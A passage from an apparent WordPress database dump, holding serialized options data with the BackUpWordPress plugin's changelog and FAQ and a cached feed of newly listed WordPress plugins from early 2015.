(zipped) Folders\" on Windows XP.</li>\n</ul>\n\n<h4>1.1.2</h4>\n\n<ul>\n<li>Fix a bug that stopped <code>HMBKP_DISABLE_AUTOMATIC_BACKUP</code> from working.</li>\n</ul>\n\n<h4>1.1.1</h4>\n\n<ul>\n<li>Fix a possible <code>max_execution_timeout</code> fatal error when attempting to calculate the path to <code>mysqldump</code>.</li>\n<li>Clear the running backup status and reset the calculated filesize on update.</li>\n<li>Show a link to the manage backups page in the plugin description.</li>\n<li>Other general fixes.</li>\n</ul>\n\n<h4>1.1</h4>\n\n<ul>\n<li>Remove the logging facility as it provided little benefit and complicated the code, your existing logs will be deleted on update.</li>\n<li>Expose the various <code>Constants</code> that can be defined to change advanced settings.</li>\n<li>Added the ability to disable the automatic backups completely <code>define( \'HMBKP_DISABLE_AUTOMATIC_BACKUP\', true );</code>.</li>\n<li>Added the ability to switch to file only or database only backups <code>define( \'HMBKP_FILES_ONLY\', true );</code> Or <code>define( \'HMBKP_DATABASE_ONLY\', true );</code>.</li>\n<li>Added the ability to define how many old backups should be kept <code>define( \'HMBKP_MAX_BACKUPS\', 20 );</code></li>\n<li>Added the ability to define the time that the daily backup should run <code>define( \'HMBKP_DAILY_SCHEDULE_TIME\', \'16:30\' );</code></li>\n<li>Tweaks to the backups page layout.</li>\n<li>General bug fixes and improvements.</li>\n</ul>\n\n<h4>1.0.5</h4>\n\n<ul>\n<li>Don\'t ajax load estimated backup size if it\'s already been calculated.</li>\n<li>Fix time in backup complete log message.</li>\n<li>Don\'t mark backup as running until cron has been called, will fix issues with backup showing as running even if cron never fired.</li>\n<li>Show number of backups saved message.</li>\n<li>Add a link to the backups page to the plugin action links.</li>\n</ul>\n\n<h4>1.0.4</h4>\n\n<p>Don\'t throw PHP Warnings when <code>shell_exec</code> is disabled</p>\n\n<h4>1.0.3</h4>\n\n<p>Minor bug fix release.</p>\n\n<ul>\n<li>Suppress <code>filesize()</code> warnings when calculating backup size.</li>\n<li>Plugin should now work when symlinked.</li>\n<li>Remove all options on deactivate, you should now be able to deactivate then activate to fix issues with settings etc. becoming corrupt.</li>\n<li>Call setup_defaults for users who update from backupwordpress 0.4.5 so they get new settings.</li>\n<li>Don\'t ajax ping running backup status quite so often.</li>\n</ul>\n\n<h4>1.0.1 & 1.0.2</h4>\n\n<p>Fix some silly 1.0 bugs</p>\n\n<h4>1.0</h4>\n\n<p>1.0 represents a total rewrite & rethink of the BackUpWordPress plugin with a focus on making it \"Just Work\". The management and development of the plugin has been taken over by <a href=\"http://hmn.md\">Human Made Limited</a> the chaps behind <a href=\"https://wpremote.com\">WP Remote</a></p>\n\n<h4>Previous</h4>\n\n<p>Version 0.4.5 and previous were developed by <a href=\"http://profiles.wordpress.org/users/wpdprx/\">wpdprx</a></p>\";s:3:\"faq\";s:4053:\"<p><strong>Where does BackUpWordPress store the backup files?</strong></p>\n\n<p>Backups are stored on your server in <code>/wp-content/backups</code>, you can change the directory.</p>\n\n<p><strong>Important:</strong> By default BackUpWordPress backs up everything in your site root as well as your database, this includes any non WordPress folders that happen to be in your site root. This does means that your backup directory can get quite large.</p>\n\n<p><strong>How do I restore my site from a backup?</strong></p>\n\n<p>You need to download the latest backup file either by clicking download on the backups page or via <code>FTP</code>. <code>Unzip</code> the files and upload all the files to your server overwriting your site. You can then import the database using your hosts database management tool (likely <code>phpMyAdmin</code>).</p>\n\n<p>See this post for more details <a href=\"http://hmn.md/backupwordpress-how-to-restore-from-backup-files/\" rel=\"nofollow\">http://hmn.md/backupwordpress-how-to-restore-from-backup-files/</a>.</p>\n\n<p><strong>Does BackUpWordPress back up the backups directory?</strong></p>\n\n<p>No.</p>\n\n<p><strong>I\'m not receiving my backups by email</strong></p>\n\n<p>Most servers have a filesize limit on email attachments, it\'s generally about 10mb. If your backup file is over that limit it won\'t be sent attached to the email, instead you should receive an email with a link to download the backup, if you aren\'t even receiving that then you likely have a mail issue on your server that you\'ll need to contact your host about.</p>\n\n<p><strong>How many backups are stored by default?</strong></p>\n\n<p>BackUpWordPress stores the last 10 backups by default.</p>\n\n<p><strong>How long should a backup take?</strong></p>\n\n<p>Unless your site is very large (many gigabytes) it should only take a few minutes to perform a back up, if your back up has been running for longer than an hour it\'s safe to assume that something has gone wrong, try de-activating and re-activating the plugin, if it keeps happening, contact support.</p>\n\n<p><strong>What do I do if I get the wp-cron error message</strong></p>\n\n<p>The issue is that your <code>wp-cron.php</code> is not returning a <code>200</code> response when hit with a http request originating from your own server, it could be several things, most of the time it\'s an issue with the server / site and not with BackUpWordPress.</p>\n\n<p>Some things you can test are.</p>\n\n<ul>\n<li>Are scheduled posts working? (They use wp-cron too).</li>\n<li>Are you hosted on Heart Internet? (wp-cron is known not to work with them).</li>\n<li>If you click manual backup does it work?</li>\n<li>Try adding <code>define( \'ALTERNATE_WP_CRON\', true ); to your</code>wp-config.php`, do automatic backups work?</li>\n<li>Is your site private (I.E. is it behind some kind of authentication, maintenance plugin, .htaccess) if so wp-cron won\'t work until you remove it, if you are and you temporarily remove the authentication, do backups start working?</li>\n</ul>\n\n<p>If you have tried all these then feel free to contact support.</p>\n\n<p><strong>How to get BackUpWordPress working in Heart Internet</strong></p>\n\n<p>The script to be entered into the Heart Internet cPanel is: <code>/usr/bin/php5 /home/sites/yourdomain.com/public_html/wp-cron.php</code> (note the space between php5 and the location of the file). The file <code>wp-cron.php</code> <code>chmod</code> must be set to <code>711</code>.</p>\n\n<p><strong>Further Support & Feedback</strong></p>\n\n<p>General support questions should be posted in the <a href=\"http://wordpress.org/tags/backupwordpress?forum_id=10\">WordPress support forums, tagged with backupwordpress.</a></p>\n\n<p>For development issues, feature requests or anybody wishing to help out with development checkout <a href=\"https://github.com/humanmade/backupwordpress/\">BackUpWordPress on GitHub.</a></p>\n\n<p>You can also tweet <a href=\"http://twitter.com/humanmadeltd\">@humanmadeltd</a> or email <a href=\"mailto:support@hmn.md\">support@hmn.md</a> for further help/support.</p>\";}s:13:\"download_link\";s:63:\"http://downloads.wordpress.org/plugin/backupwordpress.2.2.4.zip\";s:4:\"tags\";a:10:{s:7:\"archive\";s:7:\"archive\";s:7:\"back-up\";s:7:\"back up\";s:6:\"backup\";s:6:\"backup\";s:7:\"backups\";s:7:\"backups\";s:8:\"database\";s:8:\"database\";s:2:\"db\";s:2:\"db\";s:5:\"files\";s:5:\"files\";s:9:\"humanmade\";s:9:\"humanmade\";s:6:\"wp-cli\";s:6:\"wp-cli\";s:3:\"zip\";s:3:\"zip\";}}','no'),(377,'_transient_timeout_hmbkp_schedule_default-1_filesize','2741168448','no'),(378,'_transient_hmbkp_schedule_default-1_filesize','48608104','no'),(761,'_transient_timeout_feed_57bc725ad6568758915363af670fd8bc','1423563976','no'),(762,'_transient_feed_57bc725ad6568758915363af670fd8bc','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/plugins/browse/new/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 22:17:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Plotly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wp-plotly/#post-77104\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 14:55:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77104@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Embed Plotly graphs in wordpress admin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"andrefarzat\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"QuickieBar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/quickiebar/#post-77558\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 22:08:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77558@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"QuickieBar makes it easy for you to convert visitors by adding an attractive and easily customizable conversion bar to the top or bottom of your site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"philbaylog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"securelogin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/securelogin/#post-77170\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 11:02:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77170@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"Creates a shortcode that outputs a login form to access the application on securelogin.nu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"sbrn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"WPSEO Pinterest Rich Pins for WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/plugins/wpseo-pinterest-rich-pins-for-woocommerce/#post-77417\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 15:47:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77417@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Add Pinterest Rich Pin data to WooCommerce Product Pages via WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Jonathan Christopher\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"TriedPassword\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/triedpassword/#post-77484\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 14:36:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77484@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"A Wordpress Plugin that helps you find who tried to force enter your wordpress blog and what password they tried.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Global Websoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Shopello API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/plugins/shopello/#post-77402\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 08:22:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77402@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:143:\"A neat plugin that gives you two shortcodes and enables you to make money through affiliate by providing the whole product list of shopello.se!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Shopello\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Easy Site Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/easy-site-importer/#post-77535\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 14:56:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77535@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:142:\"Easily copy and import content from any site by spidering, scraping and then processing the text, images and meta content from any other site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"awfowler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Featured Posts by BestWebSoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/bws-featured-posts/#post-77522\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 10:11:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77522@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Displays featured posts randomly on any website page.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Testimonials by BestWebSoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/bws-testimonials/#post-77523\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 10:13:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77523@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Plugin for displaying Testimonials.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"WooCommerce Naguro Connect\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/plugins/woocommerce-naguro-connect/#post-77515\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 06:40:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"77515@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"This plugin connects your WooCommerce install to the Naguro 